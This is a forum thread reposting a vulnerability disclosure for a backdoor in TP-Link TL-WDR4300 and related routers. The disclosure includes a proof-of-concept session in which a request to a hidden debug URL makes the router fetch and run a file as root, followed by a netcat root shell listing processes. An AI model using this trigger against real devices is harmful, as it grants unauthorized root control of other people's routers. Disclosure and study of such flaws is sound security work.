Active Members Fi8sVrs Posted March 14, 2013 Active Members Report Share Posted March 14, 2013 About the TP-Link RouterTP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.Tested FirmwareWe tested the remote root PoC on the newest firmware (published on 25.12.2012):TL-WDR4300 – tested firmware versionThe following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability.Proof of Conceptroot@secu:~# nc 192.168.0.1 2222(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refusedroot@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .htmlConnecting to 192.168.0.1:80... connected.HTTP request sent, awaiting response... 200 OKLength: unspecified [text/html]Saving to: "start_art.html" [ <=> ] 426 --.-K/s in 0s2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]root@secu:~# nc 192.168.0.1 2222ps PID Uid VmSize Stat Command 1 root 404 S init 2 root SW< [kthreadd] 3 root SW< [ksoftirqd/0] 4 root SW< [events/0] 5 root SW< [khelper] 6 root SW< [async/mgr] 7 root SW< [kblockd/0] 8 root SW [pdflush] 9 root SW [pdflush] 10 root SW< [kswapd0] 17 root SW< [mtdblockd] 18 root SW< [unlzma/0] 71 root 2768 S /usr/bin/httpd 76 root 380 S /sbin/getty ttyS0 115200 78 root 208 S ipcserver 82 root 2768 S /usr/bin/httpd 83 root 2768 S /usr/bin/httpd 86 root 732 S ushare -d -x -f /tmp/ushare.conf 92 root 348 S syslogd -C -l 7 96 root 292 S klogd 101 root SW< [napt_ct_scan] 246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf 286 root 2768 S /usr/bin/httpd 299 root 2768 S /usr/bin/httpd 300 root 2768 S /usr/bin/httpd 305 root 2768 S /usr/bin/httpd 307 root 2768 S /usr/bin/httpd 309 root 2768 S /usr/bin/httpd 310 root 2768 S /usr/bin/httpd 389 root 2768 S /usr/bin/httpdDetailsAfter the following HTTP request is sent:http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.htmlthe router downloads a file (nart.out) from the host which has issed the http request and executes is as root:PoC – diagramSample captures from the host which issues the http request:Wireshark filter used to show router tftp trafficnart.out tftp requestModels affectedTL-WDR4300TL-WR743ND (v1.2 v2.0)…History of the bug12.02.2013 – TP-Link e-mailed with details – no response22.02.2013 – TP-Link again e-mailed with details – no response12.03.2013 – public disclosureMore informationMore information about TP-Link backdoorSourceTP-Link http/tftp backdoor Quote Link to comment Share on other sites More sharing options...
Maximus Posted March 14, 2013 Report Share Posted March 14, 2013 Imi place : 12.03.2013 – public disclosure Quote Link to comment Share on other sites More sharing options...
